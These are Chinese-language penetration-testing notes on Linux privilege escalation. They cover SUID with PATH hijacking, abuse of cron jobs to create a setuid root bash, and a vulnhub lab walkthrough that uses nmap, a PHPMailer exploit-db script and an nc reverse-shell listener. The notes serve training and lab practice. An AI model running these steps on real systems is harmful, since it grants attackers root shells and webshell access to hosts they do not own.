配合SUID本地環境變數提權
思路原理:利用sh環境變數替換,使得/tmp/ps得到root許可權;ps=sh
過程:手寫呼叫檔案-編譯-複製檔案-增加環境變數-執行
gcc demon1.c -o shell
cp /bin/sh /tmp/ps
export PATH=/tmp:$PATH # webshell許可權無法設定環境變數
./shell
id
提前本地定時任務(crontab)安全
1、路徑問題-利用計劃任務指向檔案相對路徑解析問題
cat /ect/crontab
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/lcn/test.sh
chmod +x /home/lcn/test.sh
/tmp/bash
2、利用萬用字元配合命令引數自定義命令實習提權
原理:解壓命令同時可以執行命令;
3、許可權問題-利用不安全的許可權分配操作導致定時任務覆蓋;
chmod 777 775等 普通使用者透過修改計劃任務覆蓋其達到命令執行效果;
新增許可權 chmod +x test.sh;不正確操作為chmod 777 test.sh;
提前可透過ls -al檢視所有檔案許可權;
linux提權資料-mysql-UDF-vulnhub靶場
1、nmap進行內網探測 nmap 192.168.127.0/24
2、全埠掃描;nmap -p1-65535 192.168.127.141
3、服務探測
4、webpath目錄掃描(dirbuster),cms模組呼叫getshell
http://192.168.127.142/manual/
http://192.168.127.142/vendor/
5、搜尋exp,getshell
| PHPMailerAutoload.php | |
 |
/var/www/html/vendor/
flag1{a2c1f66d2b8051bd3a5874b5b6e43e21}。。。
version;
5.2.16
配置檔案歷史漏洞;
searchsploit phpmailer 搜尋歷史漏洞資訊kali;
複製當前目錄cp /usr/share/exploitdb/exploits/php/webapps/40974.py ./
2、exploit-db中下載exp
修改exp vim 40974.py ,分別為上傳地址,木馬路徑和木馬上傳路徑;還有反彈shell地址;
啟動指令碼 python3 40974.py ,監聽埠nc -lvvp 4444
後續參考查詢mysql賬密進行udf提權;
linux提權總結
1、提權環境-資訊收集(SUID,定時任務,可能漏洞,第三方服務等)
2、最新相關漏洞要明確,二次開發相關指令碼(shell程式設計)
3、本地msf-searchexploit指令碼遠端exploitdb站點搜尋說明
4、其他提權方法如:密碼複用、guid、sudo等